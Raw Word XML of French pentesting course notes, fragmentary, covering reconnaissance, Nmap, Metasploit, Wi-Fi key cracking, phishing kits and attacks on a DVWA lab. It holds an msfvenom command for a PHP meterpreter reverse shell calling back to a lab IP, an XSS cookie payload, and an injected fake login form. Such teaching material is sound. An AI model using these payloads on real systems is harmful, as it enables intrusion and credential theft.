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1CC251DF" w:rsidR="00223B72" w:rsidRDefault="007A73EB" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_qkkdylyb7rc6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve">Module </w:t>
      </w:r>
      <w:r w:rsidR="00127426">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B23609">
        <w:t xml:space="preserve">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Les actes malveillants courant des systemes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(par coeur)</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 Chiffrement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(MàJ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La non répudiation</w:t>
      </w:r>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t>Mettre en oeuvre une solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39466534" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Evaluer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lastRenderedPageBreak/>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e-mail.</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ait référence au cas ou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r>
        <w:t xml:space="preserve">est un processus de récupération de mdp qui s’effectue à l’aide d’un logiciel spécialisé et d’une technologie informatique de haute capacité. Les pirates informatiques sont capables de tester de nombreuses combinaisons de mdp dans un court laps de temps. Pour empêcher le </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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r w:rsidR="00B23609" w:rsidRPr="00E63830">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>emails</w:t>
      </w:r>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Attaque par Whaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC52A33" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le whaling, ou harponnage, est une forme sophistiquée de hameçonnage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lastRenderedPageBreak/>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r>
        <w:t xml:space="preserve">fraudeur récurrent </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8070D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">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t xml:space="preserve">Une attaque par déni de service distribué (DDoS) est une cyberattaque où plusieurs systèmes compromis (souvent des botnets) inondent la cible (un serveur, un service web ou un réseau) avec un volume massif de trafic, rendant les ressources inaccessibles aux utilisateurs </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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Un botnet est un ensemble de systèmes contrôlables par un attaquant via des serveurs de commande. Les propriétaires de ces systèmes ne savent pas que leurs PC participe à un botnet (leur PC à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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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numérique )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rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_6uri2eifcnoa" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:t xml:space="preserve">Module 2 - Introduction au pentesting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69018B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="766D0C02" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>définition et objectif du pentesting</w:t>
      </w:r>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7E98261E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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Pentesting </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pentesting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vulné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du hacking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lastRenderedPageBreak/>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r>
        <w:t>fournir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r>
        <w:t>son architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AF59F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ses systèmes d’exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CDAEE7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ses applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB9B19" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ses protocoles de communication, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939FD5A" w14:textId="7A04F4B6" w:rsidR="00223B72" w:rsidRDefault="00B23609">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lastRenderedPageBreak/>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r>
        <w:t>Elaboration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r>
        <w:t>identification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B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_umhyu8voblrp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Module 3 - Présentation de la suite Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E31C8E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pP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r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>BackTrack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : distribution regroupant l’ensemble des outils nécessaires au test de sécurité d’un réseau qui est reconnu par les professionnels de la sécurité informatique comme outil complet, développé par la société Remote exploité par les développeurs Mati Aharoni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r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>BackTrack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, développe Mati Aharoni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AMD )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B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_8todvzo98ddq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t xml:space="preserve">Module 4 - Footprint et reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6FF15" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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Footprinting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460ADC16" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="29AA1CB3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">La collecte d’information est toujours passive (dans le cadre du pan testing)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Dork </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EDF9EE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant Google Hacking Database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r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Ex: &lt;&lt;intext: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En utilisant Google Dorks et Google Hacking Database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Shellcodes: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r>
        <w:t>on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SHODAN IO (site web payant qui font de la recherche sur tout ce qui est ip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r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Spiderfoot </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4107DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="18D78BBE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t>Lancement de Spiderfoot en mode int web pour une meilleur utilisation et visualisation du résultat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018C56D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="715AB26C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t>tapez : spiderfoot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firefox : </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5151</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> et cliquez sur nwescan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r>
        <w:t xml:space="preserve">Les éléments trouvé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r>
        <w:t>Exemple: nous avons le mail du ccicampusol!</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r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325799E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B72766" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap est un scanner de ports libres créé par Fyodor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r>
        <w:t xml:space="preserve">Armitage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lastRenderedPageBreak/>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r>
        <w:t xml:space="preserve">avec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6F120C4A" w:rsidR="00223B72" w:rsidRDefault="00B23609" w:rsidP="00033A1A">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_pxgcderyta5b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00033A1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Les phases de gestion des vulnérabilités </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9D1A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5A7C4DD4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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r>
        <w:t>évaluer</w:t>
      </w:r>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rsidP="00033A1A">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_upmgd2fsd152" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:t xml:space="preserve">Chapitre 2 - NMAP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B66635" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="717BE5D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">Lien TP : </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="0000EE"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>NMAP.odt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="392CE97B" w14:textId="6AE553B4" w:rsidR="00223B72" w:rsidRDefault="00033A1A">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_acrv22h4fp7l" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 3 - </w:t>
      </w:r>
      <w:r w:rsidR="00B23609">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pour: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0E819529" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_bvnp46e97f6f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre </w:t>
      </w:r>
      <w:r w:rsidR="00033A1A">
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> - NESSUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C66C68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_tx184o7i4rz6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Les composants de metasploit framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61398EFF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="782FB5D5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; L’interface de ligne de commande principale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FAD7B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="468F2053" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Modules de support tels que les exploits, les scanners, les charges utiles, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7E56B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24892ED6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>outils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Outils autonomes qui faciliteront la recherche de vulnérabilités, l’évaluation des </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6900C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">vulnérabilités ou les tests d'intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B610110" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0372A173" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">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25A55159" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_sj6a6kbvyn3w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:t>Module 6 - Exploitation des failles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E8B56" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pP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lastRenderedPageBreak/>
        <w:t>Backdoor vsftpd</w:t>
      </w:r>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Chapitre 1 - Les réseaux sans file (WLAN)</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r>
        <w:t xml:space="preserve">Wimax </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD3E25" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="43A60847" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">Modes de fonctionnement d’un réseau Wlan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(wired equivalent privacy) protocole de sécurité ancien, peu sécurisé </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D392E9D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WPA </w:t>
      </w:r>
      <w:r>
        <w:t>(WIFI Protected Access 2= plus sécurisé que WEP mais vulnérable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE2110" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Wifi protected Access 2) plus sécurisé que WAP, le plus utilisé aujourd'hui </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A074F75" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WPA3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Wifi Protected Access 3) plus sécurisé que WAP2, utilisé pour les réseaux public</w:t>
      </w:r>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file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t>Usurpation de MACs</w:t>
      </w:r>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r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Evil Twin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“sniffing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Craquage de clés WEP / wpa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wireshark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On va voir s’il y’a des paquets d’authentification qui ont transiter sur le réseau avec le filtre « eapol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Nous n’avons rien , si nous lançons la capture sur le réseau du CCI nous aurons également aucun paquets eapol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2 - Aircrack</w:t>
      </w:r>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Aircrack-ng</w:t>
      </w:r>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1 – installer un adaptateur Wlan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On peut voir que la carte réseau WLAN est présente mais que aucun réseau n’est monté. La dans notre cas, on ne voit pas le réseau wlan.</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On vérifier les cartes WIFI avec « iwconfig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4 - Arrêter des gestionnaire de réseau ( protocole d’authentification ) désactiver le monde de contrôle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C899D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>« Airmon-ng crack kill”</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B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_ny0gxtd3ecpn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r>
        <w:t xml:space="preserve">Module 8  - Hameçonnage (Phishing) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B6447" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pP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Chapitre 1  - Qu’est ce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etc,) en utilisant le logo et le nom de cet organisme. Il vous envoie un mail vous demandant généralement de “mettre à jour” ou de “confirmer vos infos suite à un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r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ca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lastRenderedPageBreak/>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spear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spear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Whaling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lastRenderedPageBreak/>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Lors de ces attaques, un message s’affiche pendant que vous naviguez sur le web et vous indique que quelque chose ne vas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L’Evil twin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cliquez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Un attaquant se fait passer pour un représentant d’un service clientèle (CSR) dans le but de vous convaincre de divulguer vos infos perso.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lastRenderedPageBreak/>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fait ,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TrsutedSec et écrit par David Kennedy  en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vas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r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>allez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vas sur l’ip de votre vm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On vas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l’ip de la VM est  on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password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224605D9" w:rsidR="00223B72" w:rsidRDefault="00B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_t6s9tl3312ro" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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35B2CBF" w:rsidR="00223B72" w:rsidRDefault="00B23609">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FIchiers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du code sourde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Affichage de la réponse du serveur (c’est la non répudiation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE45BC7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Curl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un  navigateur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microservices peut appeler plusieurs microservices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computing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Les  10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La crypto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scripting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Les ,mauvaise config de sécu englobent une variété de vulnérabilités potentielles, mais voici les plus courantes; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA0D19" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vulné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Utilisation de fichiers XML vulné</w:t>
      </w:r>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frameworks,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jou,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lulute de débit imposées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les dev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qu”ils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(Server-Side Request Forgery - SSRF)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Cette vulné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 xml:space="preserve">Installation et config d’un serveur DVWA (Damn vulnerable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leur compétences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-i install apache2 mariadb-server php php-mysqli php-gd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r>
              <w:t>git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Mysql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r>
        <w:t>la commande : msfvenom -p php/meterpreter_reverse_tcp LHOST=10.71.121.135 LPORT=6000 -f raw&gt;msfv-shell.php</w:t>
      </w:r>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uploads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Lancer Metasploit Framework : dans le terminal tapez msfconsole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Reflected </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6193A817" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dans le champ “what’ your name ?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4680C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:tab/>
        <w:t>Saisir le script suivant : &lt;script&gt;alert(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56389190" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="53352F3B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">Dans ce script, nous demandons à l’application Web de nous alerter en affichant une fenêtre contextuelle &lt;&lt;document.cookie&gt;&gt;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Reflected entrez le scrt suivant : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06C70A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7B0E8898" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t>&lt;h3&gt;Authentication serveur&lt;/h3&gt; &lt;form action=</w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://localhost</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt;Nom d’utilisateur:&lt;br&gt;&lt;input type=&lt;&lt;username&gt;&gt; name=&lt;&lt;username&gt;&gt;&gt;&lt;/br&gt;Mot de passe:&lt;br&gt;&lt;input type=”password…..</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On vas lister les fichiers : locahost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éxecution de commande en utilisant metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6D802" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="52F984A4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Démarrer Metsploit et utiliser l’exploit multi/script/web-delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49625F18" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use exploit/multi/script/web_delivery </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6FB8D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">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zap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r>
        <w:t xml:space="preserve">Automated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8EED16E" w14:textId="1E02AAA4" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_seabid4wpwke" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Module 12 </w:t>
      </w:r>
      <w:r w:rsidR="00137BEB">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cryptographie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE567A9" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre 1 : Besoin de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6C498" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="6F70BAFB" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="52C21F20" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">En se basant sur les critères de sécurité de l’analyse de risque qui sont : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C30F6D9" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7D7AD611" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="00CE66A8" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE66A8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">DICP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C735876" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="00534394" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="2015A4AD" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D =&gt; Disponibilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B336C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
